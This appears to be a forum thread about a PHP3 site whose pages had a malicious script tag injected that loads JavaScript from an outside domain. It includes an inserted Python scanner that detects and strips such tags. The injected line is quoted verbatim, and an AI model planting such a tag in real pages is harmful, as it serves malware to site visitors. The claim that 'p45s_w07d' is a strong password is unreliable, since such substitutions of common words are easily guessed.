Hi Guys,

 

My background consists of HTML, CSS, Dreamweaver, ASP and MS access and SQL.

Unfortunately I have no experience with PHP.

 

Recently my friend's website (which was built by someone else in the past, uses PHP3 and MySQL) has become a victim of a malware attack where the below line of code has been written to every .php3 page in the site:

<script src=http://www.movaddw.com/fgg.js></script>

There is an article about this here: http://infosec20.blogspot.com which I don't fully understand either. As a result my friend's AdWords account with Google has been suspended, which is not good.

 

We got in touch with the support people who host the site, they advised us to

a) Remove the malicious line of code from each page and

b) Upgrade the site to php5

 

This is where I am now

a) I have removed the malicious line of code from all pages but

b) I have no idea what's involved in upgrading the site to PHP5!

 

I've opened the pages of the site in Dreamweaver and can see where 'php3' is mentioned in the code eg: include("settings.php3"); and the static links to the other pages like 'products.php3'.

After doing some googling on this I am beginning to think that a lot more advanced type of changes to the php3 code might be needed. This is where my confidence takes a dive.

 

I can see in the control panel where the site is hosted that the site is hosted on a server that uses PHP Version 4.4.7. There is also an option to request that the site be moved to a server that uses PHP Version 5.2.3

 

My question therefore is:

What exactly is involved and what do I need to do when someone says "you need to update the code in all your .php3 pages to .php5"?

 

 

I would be very grateful if any PHP gurus out there could offer assistance.

Thank you.

 

 


It is not as simple as changing the file extensions from .php3 to .php5. The majority of the code will have to be redone, there is no other simple approach.

Without seeing the code I cannot give you specific instructions on what to do. If you're wanting to recode the site yourself, you're going to need to learn PHP. Before doing anything, make sure you have a good, thorough understanding of the basics.

Thank you wildteen88, you have answered my question clearly.

 

Extracted some of the email from google adwords team:

> > If your site was compromised, it's important to not only remove the
> > malicious (and usually hidden) content from your pages, but to also
> > identify and fix the vulnerability. We suggest contacting your hosting
> > provider if you're unsure of how to proceed. StopBadware also has a
> > resource page for securing compromised sites at
> > http://www.stopbadware.org/home/security. Google uses its own criteria,
> > procedures, and tools to identify sites that host or distribute
> > malware. If you feel your site has been mistakenly identified, need
> > help understanding the issue and how to address it, or if you've made
> > changes to your site so that it no longer hosts or distributes
> > malicious software and you've secured your site so that it is no longer
> > vulnerable to the insertion of malware, please respond to this email to
> > let us know. We'd be happy to answer any questions you have and help
> > you resolve this serious issue.
> > Sincerely,
> >
> > The Google AdWords Team

 

I suppose if this happens again I'll just remove the malicious line of code from all infected pages. It looks like otherwise my friend should either go back to the person who built the site in the first place or have the site upgraded to PHP5 professionally.

 

Many thanks.  :)
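
A way to find and strip the injected line across a site tree, generalised beyond the thread's one URL to any `<script src>` that points at a host outside an allow-list, since a repeat injection may use a different domain. This is an added example, not code from the thread; the function names, the allow-list parameter and the three sample pages are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# <script ... src=URL ...></script>, URL quoted or unquoted, any letter case.
SCRIPT_TAG = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)["']?[^>]*>\s*</script\s*>""", re.IGNORECASE)

def is_foreign(url, allowed_hosts):
    """True if url names a host that is not allow-listed (relative URLs are local)."""
    try:
        host = urlparse(url).hostname
    except ValueError:  # malformed URL: report it rather than skip it
        return True
    return bool(host) and host.lower() not in allowed_hosts

def external_scripts(text, allowed_hosts):
    """Return [(line_number, url)] for script tags loading from foreign hosts."""
    return [(text.count("\n", 0, m.start()) + 1, m.group(1))
            for m in SCRIPT_TAG.finditer(text)
            if is_foreign(m.group(1), allowed_hosts)]

def strip_scripts(text, allowed_hosts):
    """Return text with foreign script tags removed, everything else untouched."""
    return SCRIPT_TAG.sub(
        lambda m: "" if is_foreign(m.group(1), allowed_hosts) else m.group(0), text)

def scan_tree(root, allowed_hosts, suffixes=(".php3", ".php", ".inc", ".html", ".htm")):
    """Map each page under root (relative path) to its foreign script tags."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = external_scripts(path.read_text(encoding="latin-1"), allowed_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    tag = "<script src=http://www.movaddw.com/fgg.js></script>"  # line quoted in the thread
    pages = {  # constructed sample pages, written to a temporary directory
        "index.php3": '<?php include("settings.php3"); ?>\n<p>Home</p>\n' + tag + "\n",
        "products.php3": '<script src="js/menu.js"></script>\n<p>Products</p>\n',
        "settings.php3": "<?php $title = 'Shop'; ?>\n<SCRIPT SRC='http://www.movaddw.com/fgg.js'></SCRIPT>\n",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, body in pages.items():
            (Path(d) / name).write_text(body, encoding="latin-1")
        return scan_tree(d, allowed_hosts=set())
```

An empty report only shows that the tags are gone; as the AdWords email above says, the vulnerability that let them be written still has to be identified and fixed.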

From an exploit in your PHP code. That is how sites get hacked. You should recode your site completely to prevent this.

 

One of the main reasons why sites get hacked is due to poor data validation, also as your site uses PHP3 then another cause is register_globals. As of PHP4 it has been disabled and is soon to be removed from PHP6. register_globals can cause security exploits within your code.

> ....also as your site uses PHP3 then another cause is register_globals. As of PHP4 it has been disabled and is soon to be removed from PHP6. register_globals can cause security exploits within your code.

 

So when PHP6 is released does that mean whatever parts of the php3 website that requires these register_globals will not work/function correctly?

 

Is there any advantage in making the FTP password more secure?

Is there any advantage in making the password to the database more secure?

At the moment the FTP and database password is quite simple.

 

Thank you.

There is always an advantage to having more secure passwords, but in this case the weak passwords most likely did not contribute to your site being compromised. It was probably because of vulnerabilities in the code itself. I won't go into detail as to WHAT they probably did, as I am not sure of this forum's policies on discussing malicious code. But basically they found a vulnerability in the PHP itself that allowed your own pages to rewrite themselves with malicious code.

 

You will need to rewrite the code in order to plug these vulnerabilities, and will also most likely need to rewrite your code if you upgrade to PHP5, as the code itself changes between each version. Some functions are removed, others added and still others modified.

 

> So when PHP6 is released does that mean whatever parts of the php3 website that requires these register_globals will not work/function correctly?

Yes that is exactly what he is saying.

> Is there any advantage in making the FTP password more secure?

Yes, it makes it harder for Brute force attacks to be successful.

Your Hosting provider should by default kick FTP users that fail to get the user name and password correct within a predefined limit... Typically 10 tries, and then the IP address should be banned from accessing the server for about 2hrs.

> Is there any advantage in making the password to the database more secure?

Yes, it makes it harder for Brute force attacks to be successful, although if they get access to FTP then they have access to your database username and password.

> At the moment the FTP and database password is quite simple.

Well, complicate the password: instead of having "password" as your password, have "p45s_w07d", which is a combination of letters and numbers and non-alphanumeric characters; it would take a brute force attack program potentially years to crack that.

Remember that a chain is only as strong as the weakest link, so even if you have the most secure site in the world, it would be pointless if your FTP username was admin and the password was pass.

Your host is partly to blame on this one. PHP3 hasn't been supported for over 5+ years. They should have dropped support and then you would have had to upgrade to at least php4. If you want someone else to redo your code, post in the Freelancer area.

 

Ken
